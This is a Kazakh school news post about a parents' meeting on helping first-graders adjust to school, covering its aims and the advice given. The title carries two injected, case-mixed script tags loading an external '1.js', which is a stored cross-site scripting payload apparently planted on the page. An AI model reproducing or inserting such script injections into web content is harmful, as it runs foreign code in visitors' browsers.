Бірінші сынып оқушыларын педагогикалық сүйемелдеу<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.10.2019

Бүгін мектепте «Бірінші сынып оқушыларын педагогикалық сүйемелдеу» тақырыбында ата-аналар жиналысы өтті.

Мақсаты: барлық ата – аналардың арманы-өз балаларын ақылды, өзіне сенімділігін көру және олардың таланттары мен қабілеттері болашақта сұранысқа ие болуғанын қалайды. Кешегі мектеп жасына дейінгі баланың өзіне жаңа қарым-қатынас пен жаңа қызмет түріне қиындықсыз кірігуі үшін мектеп өміріне табысты кірігудің шарттары қажет. Бұл жиналыстың эпиграфы Л. А. Венгердің «Мектепке дайын болу-оқуды, жазуды және санауды білу деген сөз емес. Мектепке дайын болу-мұның бәрін үйренуге дайын болу».

Бірінші сынып оқушыларының ата – аналарына оқушылардың жаңа позициясын анықтау бойынша ақпарат, практикалық кеңестер мен ұсыныстар ұсынылды. Бұл кезеңде баланың мектептегі табысы неге байланысты – жеке басының дайындығы, зияткерлік, психологиялық, әлеуметтік жетілуі, физиологиялық дайындығы. Ата-аналар тренингтерге, топтық жұмыстарға белсене қатысып, оқушылар рөлінде болды.

Бала өзіне және  жетістікке жететініне сену үшін, оған біз сенуіміз керек.  Сонда ғана жетістік өзін күттірмейді!

Просмотров: 798


Пікір қосу



Деректерді қолтаңбаға қосу